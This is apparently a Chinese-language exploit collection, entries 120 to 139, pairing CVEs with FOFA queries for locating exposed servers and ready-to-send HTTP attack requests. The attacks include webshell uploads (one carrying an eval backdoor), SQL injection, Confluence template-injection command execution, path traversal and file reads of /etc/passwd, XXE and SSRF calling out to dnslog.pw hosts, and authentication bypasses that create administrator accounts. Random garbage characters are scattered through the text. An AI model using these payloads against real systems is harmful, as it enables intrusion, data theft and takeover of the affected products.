120. 北京百绰智能S40管理平台导入web.php任意文件上传
( t* o) c# d# L0 n4 qCVE-2024-1253
: V( i$ K: P V# w0 t% C9 sFOFA:title="Smart管理平台"
: ]* d$ H4 O6 r/ x9 e: B2 GPOST /useratte/web.php? HTTP/1.1, i+ b5 e4 w3 o. ^5 _/ S
Host: ip:port+ h N7 j- Z. d, N/ j0 i/ @2 p
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db0 _& r# L& V% K9 k$ A @
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 Z& `5 j3 W6 U+ I' z' o2 ~7 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" E* w- v" A* C3 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" }8 L1 W, `5 z8 q
Accept-Encoding: gzip, deflate
6 v: N. K m+ p l7 B' v: A7 CContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
3 g+ y/ ^- V7 j4 b" B. S" W4 ]Content-Length: 597
& d; x& z- s5 Z7 `Origin: https://ip:port+ p' r5 X/ Y- F/ ]( [! }" b
Referer: https://ip:port/sysmanage/licence.php
3 T& {& d( G( x- \6 T! xUpgrade-Insecure-Requests: 1
" F' b( t, m8 v) E* fSec-Fetch-Dest: document
! \& K8 |( c" Y- b9 p/ oSec-Fetch-Mode: navigate
6 W- U/ I% x7 \8 f, W* ^. @4 _) OSec-Fetch-Site: same-origin8 @- @# p3 x9 I
Sec-Fetch-User: ?1% O+ Q/ i9 }4 j$ {( a: l: r# C
Te: trailers
# x5 x( W3 F5 n" r: J, RConnection: close
& R5 w" ]3 m4 C3 G
; a3 a/ n W5 h8 F2 R8 U-----------------------------42328904123665875270630079328
8 V7 X/ |7 ?" s/ F: B8 jContent-Disposition: form-data; name="file_upload"; filename="2.php"
3 G8 {3 {5 Y+ G \$ I9 BContent-Type: application/octet-stream( m9 b4 o# l' F5 u J5 I
9 `7 H8 O0 N# @3 L; X0 } Q
<?php phpinfo()?>
5 D' _8 R+ D4 I f- `3 g1 f-----------------------------42328904123665875270630079328
) W) R7 H3 i! n+ T+ H( E2 wContent-Disposition: form-data; name="id_type"
$ R$ q1 T* [7 H* m) o# k
- H9 ~* O% }5 P6 L1 G16 R b- j9 \, v7 S
-----------------------------42328904123665875270630079328
7 ^1 a- K! k- o9 {% l$ _Content-Disposition: form-data; name="1_ck"
2 A# V0 g) Q) }9 V5 h
) G$ |0 F- T0 z( B3 ?2 M9 K1_radhttp
9 D. L& p4 ^$ X: l2 [0 q-----------------------------42328904123665875270630079328
, b' k$ X" \6 kContent-Disposition: form-data; name="mode"
( S, d) r( V" ^1 @
0 d4 H: A; W7 H# Y) Bimport$ _8 A8 P2 x! |' Q3 Y% V& y" P+ i
-----------------------------42328904123665875270630079328. O$ a8 H* t2 X( v1 i) ?
7 D y- n6 X6 y8 i% P% R6 G+ C$ d/ n% Z! I; C7 d' f F) O' `
文件路径/upload/2.php+ ^% D9 f ?/ G& z7 r' m! b1 V8 @
9 @# \/ N$ v2 _0 B3 Y121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 a6 L. Q% x, n3 K i5 G6 n
CVE-2024-1918
7 b, X& Q8 f X( P0 C+ h3 l; e, }FOFA:title="Smart管理平台") S& O- @' I) d4 W
POST /useratte/userattestation.php HTTP/1.1/ ]! R8 T- z' [& J
Host: 192.168.40.130:8443
: j- d% u% E& N# RCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac503 |' C# }6 _: Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
6 Y8 G2 a! |5 I$ z5 w$ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! J" f5 G i5 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 U% e& A) e# M
Accept-Encoding: gzip, deflate% R! F0 w) E& l; P
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
0 l f8 b3 F& H- W9 F+ y% f. i8 @2 j, dContent-Length: 5921 e% K+ l N' v" [4 ^% w; ]4 [
Origin: https://192.168.40.130:8443" X4 A* C3 i6 N# B( O' v3 V9 y- C
Upgrade-Insecure-Requests: 1
h' g& F) y4 {Sec-Fetch-Dest: document7 C/ c, @/ D% u+ P+ j
Sec-Fetch-Mode: navigate
" K* T: I9 `3 Q7 U) ?Sec-Fetch-Site: same-origin
! }; ?: Z& I/ b- r" dSec-Fetch-User: ?1: h. O; V7 f3 e8 ?+ @3 B
Te: trailers
5 E: {5 f5 I( S; i$ D4 G, j! kConnection: close. B1 h; ]# `( B2 x5 Y( \& O+ \* ^; [, G
8 H1 I; n7 v/ F
-----------------------------423289041236658752706300793288 K/ a+ M) d) _1 t
Content-Disposition: form-data; name="web_img"; filename="1.php"
( ^1 D! k" z0 x# F v, MContent-Type: application/octet-stream
3 z9 r6 ^+ O% v6 }4 {8 B5 z) P6 F1 p. `* [! q1 F
<?php phpinfo();?>9 }) l' F8 f( q
-----------------------------42328904123665875270630079328
# }+ G- f8 h) ]' z$ EContent-Disposition: form-data; name="id_type"- B* ^3 W% c% @9 c" L$ X
4 S: u. N; ^1 s# d; `2 i+ w
1
! ]+ F' @1 ?" r# P' F1 B" b-----------------------------42328904123665875270630079328' I' ~0 C5 D' l+ \4 n
Content-Disposition: form-data; name="1_ck"$ D& ?% ^# j; F/ B: E
5 D! m2 A D p8 F1_radhttp5 E- J. h5 D3 R' ]4 b
-----------------------------42328904123665875270630079328
" w6 f k' k0 W% V) _! ]Content-Disposition: form-data; name="hidwel"
+ T0 v$ Q! F" X1 [0 d# w8 b' n4 e
" `* |- O% b+ E0 k" d* U2 k# y kset3 `+ I# c( K R) V2 B
-----------------------------423289041236658752706300793286 ^( l8 B9 ~* S& d
8 Z! V2 u% }$ l
) {9 [) C. d+ E' A; I
boot/web/upload/weblogo/1.php! s- R* m% r% i1 T) l
3 j! w, ?) K/ G6 a
122. 北京百绰智能s200管理平台/importexport.php sql注入5 k3 a. i; h3 `6 \3 j0 ]
CVE-2024-27718FOFA:title="Smart管理平台"
' l" |9 U+ f O3 z+ A- N- ~; |% G其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()) T8 P( u4 v6 k! c9 u$ ]# e6 O
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.11 u4 [" Z: V* F y
Host: x.x.x.x( j% B% O' k! ` ]
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc05 O1 y) J1 G! q; t+ f( x7 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! W, ^- ]: ?$ J: _2 f1 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 T2 [7 d( v6 B6 ]4 m+ \, oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: n+ x0 P6 o8 q/ G& o+ eAccept-Encoding: gzip, deflate, br1 M4 e, w& s; b9 h/ M( N: W
Upgrade-Insecure-Requests: 1- R' Z- t) D- _) J2 o5 F U
Sec-Fetch-Dest: document* Y# c' p+ M) k; s `
Sec-Fetch-Mode: navigate$ l+ s# \" I# j/ r- Q3 V
Sec-Fetch-Site: none0 @- h7 e$ Z3 l1 w3 u6 d# \
Sec-Fetch-User: ?1
- w+ W) {5 ]4 a! O' QTe: trailers
3 k* D3 f: B f5 o3 PConnection: close
* P+ G; ?% }! ]8 h% x% W
: ~4 L# S* h# \7 ] E1 @/ r, E. R: x5 _2 f
123. Atlassian Confluence 模板注入代码执行
( ?5 I* j+ h6 G& ^FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
, A) a$ m5 Y) P4 T4 B: yPOST /template/aui/text-inline.vm HTTP/1.1
) r& o7 t0 |$ KHost: localhost:8090
; A, M3 D7 T1 p4 J6 w2 {Accept-Encoding: gzip, deflate, br
1 C/ _. U, ^+ x# G4 h# y0 j% fAccept: */*
/ X- g; |+ }- m; n5 m1 E8 FAccept-Language: en-US;q=0.9,en;q=0.8/ _# H2 S6 o5 I9 Q+ J5 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 [; e6 x6 A. k: `3 Q, i3 _/ zConnection: close8 ^1 E4 o% i# n
Content-Type: application/x-www-form-urlencoded
; [2 A- E; r. i" k$ s2 m/ E3 m' ?# I6 k8 n7 d% ]# @8 C
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
7 ~3 f8 R5 k/ K( R( N a5 t- Y; v
0 ?( |/ D n/ Y8 v# n124. 湖南建研工程质量检测系统任意文件上传
/ `8 G* Z0 h" F9 d( |" {/ n- fFOFA:body="/Content/Theme/Standard/webSite/login.css"
\' Q) r6 b2 s" i3 }7 OPOST /Scripts/admintool?type=updatefile HTTP/1.1, f, L( _5 }8 d$ w$ V) q
Host: 192.168.40.130:8282$ C- I) `) y$ Y7 V7 m2 x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" s8 }% v O# `6 p
Content-Length: 72
+ a- ~6 T. m) Z) V( s- h# NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8) ?& X- p) C6 ]6 C% u
Accept-Encoding: gzip, deflate, br
I7 S4 I- [% T2 V) Z, {! i* k N. WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ b# ^; o) _( T$ X6 f! K9 I" ^7 o; gConnection: close d" z, x# a( J9 r) Q
Content-Type: application/x-www-form-urlencoded
. k' o& N x7 i6 E8 |: G$ x* t" a2 X0 G* ]& N x
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
+ N" w5 k' b2 d3 [
8 B4 { G+ k- T, f* ^" X" Z. m+ Q" O i1 e
http://192.168.40.130:8282/Scripts/abcgcg.aspx! r1 g- u8 }: B$ i
. R4 ^# v s1 @0 R U6 _125. ConnectWise ScreenConnect身份验证绕过
9 ~( V' c2 f8 t+ a; JCVE-2024-17094 b) k \1 M: ]( [2 I: U! `
FOFA:icon_hash="-82958153") u! f, O, z, k+ c' W6 d
https://github.com/watchtowrlabs ... bypass-add-user-poc$ y+ M+ i: ^6 [0 V
& j B) a8 r) [! m0 {" X6 [
9 ]) k& N: b! T4 h, P
使用方法
% @' v. S4 J$ ], E9 j+ @1 |3 K+ |python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
" A( L% T$ M, ~9 D5 N" x/ \3 W7 [( H0 Z5 a$ A/ v
9 _3 A) U6 U3 g创建好用户后直接登录后台,可以执行系统命令。& o( |! I0 d8 }( {/ {& n
9 |5 p. E& L; f
126. Aiohttp 路径遍历
# {5 E9 B4 e3 P/ D% q; A8 jFOFA:title=="ComfyUI"
* f g$ s6 T8 K/ ]$ X3 aGET /static/../../../../../etc/passwd HTTP/1.11 e" \( w+ P7 `4 ~* Z8 R/ B6 L% l- C
Host: x.x.x.x% ]% B/ Z- u L: e; O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# E+ S/ P0 U3 S4 P9 m5 y8 J+ |0 C% K
Connection: close l' [) `* w7 r# ]% X; @
Accept: */*
, w- _0 p5 j8 p8 tAccept-Language: en' D7 \) U& @. ~) p5 V; z
Accept-Encoding: gzip8 n0 `9 M: r9 S) h* P( _+ N' E
) B, k$ `' S Z9 Q' s( Y. S
# m* q# e( e7 ~! N127. 广联达Linkworks DataExchange.ashx XXE0 r2 ~2 v O; s4 q8 T
FOFA:body="Services/Identification/login.ashx"
! p; Q J1 I$ i) z+ [POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
9 h9 X1 n" P9 \& oHost: 192.168.40.130:8888- e! O- M2 w# V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36& K% x0 q& z% a' B; Q
Content-Length: 4150 q& D. {2 K& h/ ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 P+ V7 {- u; w- G! X+ q- W" c N+ W4 I
Accept-Encoding: gzip, deflate
7 R. h; V% q: d0 sAccept-Language: zh-CN,zh;q=0.9( j2 j( ]$ m1 Z( p4 @9 y
Connection: close
1 j* Q% `$ o& k1 v; c! OContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: K% o" Q0 }$ H5 V' {$ q8 h6 x* tPurpose: prefetch3 @* D* p7 T2 l3 |6 \" b
Sec-Purpose: prefetch;prerender' D E0 q* `: }: y! Y( Y3 [
1 N6 ?0 S) a( {1 w9 ~------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ A8 B! Q# {) ~ M1 z/ U5 EContent-Disposition: form-data;name="SystemName"
3 ]" A- j8 e4 L4 W o( Z) y& c# p, D, Q% a
BIM7 j9 s# Y; h9 ^9 Y5 n4 S# U/ g
------WebKitFormBoundaryJGgV5l5ta05yAIe0: k) N! ^% O, C+ Y
Content-Disposition: form-data;name="Params"* D7 {3 H& \ R3 t2 X
Content-Type: text/plain
# B; f0 O1 q" G' e
+ W. J+ B- c6 o<?xml version="1.0" encoding="UTF-8"?>& E K3 n2 H4 ?3 z- C* r8 c
<!DOCTYPE test [; p& T3 i9 `9 {) H5 w& U- ?' p s
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
) l0 R1 l% s! A+ t! |; e0 O3 G7 p+ `]4 j$ K9 K! G. \5 p3 x" r
>. m; t/ K* v& r9 I, ~
<test>&t;</test>$ r) M" x0 y7 R! C" J! _" a
------WebKitFormBoundaryJGgV5l5ta05yAIe0--- |* M% ~2 h; z5 M% l
( K$ N7 `/ C( {8 D5 U" h( ^+ e; {2 W$ P! ~9 i( d1 ^8 n6 A
# L4 f; s$ n/ `7 ~$ a2 P& @
128. Adobe ColdFusion 反序列化
& o+ w2 v+ r0 W C" OCVE-2023-38203
* L* y" J6 G' D9 eAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)' X# P I5 j2 G8 Q& |+ M
FOFA:app="Adobe-ColdFusion"6 ]/ a6 s( T8 N4 Q% k, c8 T
PAYLOAD; ^ i, B) S" N: a
: e2 b; G$ [+ Y/ k4 u. l# I. g+ A129. Adobe ColdFusion 任意文件读取 a L N$ ^& M! O3 ^
CVE-2024-20767
* N5 O; T% f8 R: z$ _' L1 UFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"& ~% B& C8 N5 M2 i9 v \: u
第一步,获取uuid
) g1 q; p C' N* C, c) nGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1# F) X r) l$ _
Host: x.x.x.x
. o% E% y1 m0 G% J/ e' [& y' [# t8 U* ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 B4 |* V! C l( Y7 A3 kAccept: */*5 P/ z; U A8 u- c1 X) F
Accept-Encoding: gzip, deflate
# I( E- S% l' w; S0 DConnection: close# o+ H9 {5 C9 ]: m/ e# x; X# [; J
: C* ]: V ^ [# B) a$ N" w
0 l8 N0 a3 q1 c$ j& u7 u) E
第二步,读取/etc/passwd文件
: G7 v& `5 _, |% SGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1: Z I3 A4 L) C2 b" B) w) I% c
Host: x.x.x.x
2 W. P* G, \9 u' p- q$ \( H* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 k- Z1 t2 a$ {
Accept: */*
7 `) ]" P, ]! e8 S9 PAccept-Encoding: gzip, deflate, T8 n+ W; O3 x$ H
Connection: close
8 S- G7 U* s7 b( a Z; k1 |+ o$ ~uuid: 85f60018-a654-4410-a783-f81cbd5000b9
( P; r, w% B; X
: T* A9 U& G; N: i9 C+ B
9 J! \2 P6 K R3 a; y+ v7 ~130. Laykefu客服系统任意文件上传
4 A- D1 |$ u! e; D# x) UFOFA:icon_hash="-334624619"
) Z0 p2 p/ m" x$ L1 @8 qPOST /admin/users/upavatar.html HTTP/1.1- ^. ]7 Q3 L, z
Host: 127.0.0.1
/ q8 D3 m. L% x" u. ]# VAccept: application/json, text/javascript, */*; q=0.01
6 j/ \( W2 Q9 O4 \$ EX-Requested-With: XMLHttpRequest
1 b7 y5 o+ i* y. y! B/ G$ kUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26; d: b8 D ]: C- t, ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR9 S0 d b- {8 M9 i' a5 F* G
Accept-Encoding: gzip, deflate" ]1 C9 G% u5 A; N. q) Z/ v
Accept-Language: zh-CN,zh;q=0.9
$ U3 n5 H( c4 o. UCookie: user_name=1; user_id=3
) J, O% _: a9 p# s ]. B" vConnection: close. ^, U2 Z, f6 v. r( z6 f
) c/ y. j$ ~! F& X
------WebKitFormBoundary3OCVBiwBVsNuB2kR2 S% x! a8 |7 `! M
Content-Disposition: form-data; name="file"; filename="1.php"
$ o. l; K, |+ A" T. w, OContent-Type: image/png
9 N8 \6 Z D4 t! q6 K/ e
' R2 l$ f5 w9 [. s4 \<?php phpinfo();@eval($_POST['sec']);?>
. x, ^. X! V% U! X" t1 u6 p' t$ B4 Q+ k------WebKitFormBoundary3OCVBiwBVsNuB2kR--* C- v. U: Z, u4 F# N+ }
( B- X! [7 G* {! L
4 ~( r$ p5 b4 D131. Mini-Tmall <=20231017 SQL注入) P1 [. D, _9 Y2 R, y0 U4 o8 d
FOFA:icon_hash="-2087517259"
: t' W/ U2 Y& L后台地址:http://localhost:8080/tmall/admin! X1 a V z& _% x* T. I* y
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0); Q/ `+ t% r9 X; ]; Q- u
; ?8 P ^; C$ ^8 r( r, a
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过 \* E# D: c2 m
CVE-2024-271989 M) M: t4 ^& X I0 q! g
FOFA:body="Log in to TeamCity"$ A( u9 B& Y1 p4 b* s
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
& }9 N+ P& F P4 m8 g& ~8 [Host: 192.168.40.130:8111 r" J! C* S1 Q# m+ m2 J3 n4 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
h9 e6 @ |; x4 p/ b: L2 C. }. KAccept: */*
7 D L$ N0 ~3 D. J MContent-Type: application/json3 z0 b* Y; K* _ Y( V
Accept-Encoding: gzip, deflate
* A# N( i% n+ c2 [8 U7 C. t$ w7 s- U+ V9 e! r, }/ M
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
! E! ?! [& j+ a' d4 ~7 \) J5 V/ L7 Q! a8 e' O
1 H0 {. ^: S2 z: X2 P" G
CVE-2024-27199( r; @0 q* L) f$ R3 ]* [7 y
/res/../admin/diagnostic.jsp
* j2 }% ? H+ f. ]8 |7 Q" g9 q M/.well-known/acme-challenge/../../admin/diagnostic.jsp
! k, h# R3 F4 @' ~ t- `/update/../admin/diagnostic.jsp
% a/ m% \/ e" r$ \9 O
* q. R0 g! I+ m: ]1 u
" z) `& D( o& u2 T) T5 LCVE-2024-27198-RCE.py5 C- C) r; r q8 K1 ~' b" `; d
1 _ ]1 v$ ~$ a! u( |
133. H5 云商城 file.php 文件上传: L* x& C2 u" w, y* r( c8 U
FOFA:body="/public/qbsp.php"/ M! t( e) A. \/ z) f' b, @. j6 S
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
# g9 e L" j( C& f# ]: V5 ZHost: your-ip) J; \& t0 c6 Z. L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* j" V4 j& \& E9 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx4 S6 S( g$ o8 A4 [$ d
! L0 t) R& @2 x8 l% ]( Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx
' T a( L' ^4 v, G5 ]Content-Disposition: form-data; name="file"; filename="rce.php"
9 X: b3 [' y, C& m1 N7 ]% v+ e/ s( NContent-Type: application/octet-stream# \: q9 ]5 r' i7 N; P
' H$ u, L0 c4 V; p9 s% n<?php system("cat /etc/passwd");unlink(__FILE__);?>- d$ s9 Y2 j0 C W5 D8 _' @" ]- C+ W
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--1 u3 O. J" I& r: J' [$ _% t) W" g( c
3 {7 {. h3 l0 D2 \. t6 ~7 ~5 d
6 ], w" L) [1 ?' ^$ F0 ?
; K- L* f+ U6 E- v* P2 G
134. 网康NS-ASG应用安全网关index.php sql注入
+ {+ X! d X6 X OCVE-2024-23307 c" I4 J- ~& ^0 ?- z: f7 \2 U9 f
Netentsec NS-ASG Application Security Gateway 6.3版本; C9 `2 e( N3 ?/ D ^( d
FOFA:app="网康科技-NS-ASG安全网关"
; T& d! E! l3 K0 yPOST /protocol/index.php HTTP/1.15 R$ ] h* `: p8 ^/ T# k
Host: x.x.x.x
2 i, S8 N' K9 J9 r% t% V& ACookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
5 A1 t& E0 c9 J/ r6 H$ I* Z1 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0$ w5 l% O" s2 \* V) B) U8 ]+ N
Accept: */*
0 g( `- I" d I6 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ]! N! A6 N9 H( y! {: o; X2 x$ B9 wAccept-Encoding: gzip, deflate
5 ]1 B. z2 T+ z8 o" `0 |1 Q$ G$ f: lSec-Fetch-Dest: empty
1 C6 [+ K8 s6 A* w3 NSec-Fetch-Mode: cors, k- O4 e8 Z& H3 b; W2 B
Sec-Fetch-Site: same-origin
7 R. _: V$ }7 cTe: trailers
+ K/ y9 K7 d$ {; d2 e3 w) EConnection: close
9 |* |- m& W3 \7 |4 hContent-Type: application/x-www-form-urlencoded
& q! G$ k2 D' h) b, G6 R4 WContent-Length: 263. [% M* ~% B2 Z
* o$ h* L) Q" j, Z; P: x; n5 u$ A$ R8 D
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}1 K; P2 r: q8 W/ `( l! @
% |' ?1 |; ~% j
+ t6 V; x. e( h
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入/ u* A+ J4 s1 {0 d
CVE-2024-2022
. r, G1 R9 E1 R0 ^1 b6 Y# QNetentsec NS-ASG Application Security Gateway 6.3版本
6 e# _9 G. x9 O3 x% n" ZFOFA:app="网康科技-NS-ASG安全网关" |1 j& K) a: I+ H
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
. u L1 _2 q/ {& V9 gHost: x.x.x.x
9 \* l0 U7 o" T4 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! Z1 A o9 S0 m& E) W* E c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! z n( q8 f S0 y) p
Accept-Encoding: gzip, deflate
% l' A6 n6 C* i5 N$ E& wAccept-Language: zh-CN,zh;q=0.9
3 g2 [4 @6 G8 v) Z& D. QConnection: close& [+ p D9 X8 l* f" g7 H5 X
, |; Y7 x3 ?& {, g
5 z( G+ X. ^+ y; B
136. NextChat cors SSRF
8 t1 ?" }/ K1 c& q1 @- {CVE-2023-497852 z& j( u, d: b( n# z+ |& r
FOFA:title="NextChat"
2 S# U1 s0 W: hGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1) F4 F/ s2 U! K+ E4 \* e3 q
Host: x.x.x.x:10000
( n, d, V1 W* m' p2 }" PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# W3 L; }( a% n5 n/ }4 P9 l( z
Connection: close
2 o! T# ]% `! G2 U2 [3 o1 h* [Accept: */*
* K0 \0 c$ P" a" d G$ A" Z1 w8 bAccept-Language: en
. D' s: i' }( a7 q eAccept-Encoding: gzip5 U7 ?6 s; m: p2 F
5 @' e* j. A1 i' S) }5 v1 N9 a. q0 p% |% d7 U3 Z0 B2 {3 z, Z
137. 福建科立迅通信指挥调度平台down_file.php sql注入
- S& i! h- p( y* U8 XCVE-2024-2620; h4 ?0 \% K1 `! h. x& t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ F" Y& S: ? }3 i5 e' bGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.17 T) k1 T T0 S& C
Host: x.x.x.x% F, i$ X0 r9 R. j* n" C0 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, W5 }9 G* z, ^ C( v. y: \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 E4 N% @/ l( E! f' C9 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; H+ ^ Z6 v, h+ O3 A
Accept-Encoding: gzip, deflate, br# z4 l |0 W$ B2 O) n
Connection: close
6 m5 e, c+ n5 r- kCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj% S {0 ~9 R) V p# l+ {
Upgrade-Insecure-Requests: 17 @2 r4 P/ M* s) y
0 L* `% q" A3 X! z
4 {( S5 x3 [$ E4 l+ D) z) Z138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- t% A, G! o6 i7 CCVE-2024-2621
& e' {: j% C/ {- x0 |* z( JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. P3 r$ W c2 R" h1 m9 `0 GGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 R0 y+ d* W/ o0 M, x
Host: x.x.x.x4 X# G' Z: I+ Z3 X# k9 w9 f: }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' S( }: S, }; t% F# J( x1 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( y+ O2 ?1 X! G% Q/ z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. o1 e) v+ [3 o) Z/ D4 N% n
Accept-Encoding: gzip, deflate, br [, m# y) a* I3 h' }/ W$ M
Connection: close
& W; P; N- ^8 l$ pUpgrade-Insecure-Requests: 1
5 g& D+ l6 \. q: Z& ]0 a& v7 \/ ~' i& F2 Z
5 F: P* {+ |9 g" x# G8 I+ ~0 c
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
3 {; g7 u8 L# _0 [8 S! z. [+ cCVE-2024-2622
7 r- \* W: _$ S. V I& r5 Y8 sFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- ^4 G9 }( s8 K7 n2 }5 O( Y8 f5 V! u
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1/ y+ S7 |0 p \9 n- S8 O: b- @. E# @
Host: x.x.x.x
